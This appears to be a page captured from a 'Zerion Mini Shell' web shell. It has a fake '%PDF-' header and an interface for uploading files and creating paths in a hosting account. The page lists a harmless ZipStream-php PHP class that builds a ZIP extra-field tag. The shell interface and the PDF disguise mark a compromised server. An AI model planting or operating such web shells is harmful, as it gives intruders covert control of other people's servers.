%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home2/vacivi36/core/vendor/maennchen/zipstream-php/src/Zs/
Upload File :
Create Path :
Current File : //home2/vacivi36/core/vendor/maennchen/zipstream-php/src/Zs/ExtendedInformationExtraField.php

<?php

declare(strict_types=1);

namespace ZipStream\Zs;

use ZipStream\PackField;

/**
 * @internal
 */
abstract class ExtendedInformationExtraField
{
    private const TAG = 0x5653;

    public static function generate(): string
    {
        return PackField::pack(
            new PackField(format: 'v', value: self::TAG),
            new PackField(format: 'v', value: 0x0000),
        );
    }
}

Zerion Mini Shell 1.0